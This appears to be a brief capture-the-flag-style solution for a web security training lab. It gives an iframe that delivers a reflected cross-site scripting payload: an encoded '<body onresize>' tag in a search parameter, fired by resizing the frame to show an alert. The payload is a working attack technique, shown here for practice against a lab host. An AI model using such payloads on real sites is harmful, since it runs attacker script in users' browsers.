Put this in the exploit server body and 'deliver to victim' (change the host for your lab host):
<iframe src="https://acb41fc71e32c9aa80aab06000f30012.web-security-academy.net/?search=%3Cbody+onresize%3D%22alert%28%27xss%27%29%22%3E" width=300 id="frame" onload="this.width = 500"></iframe>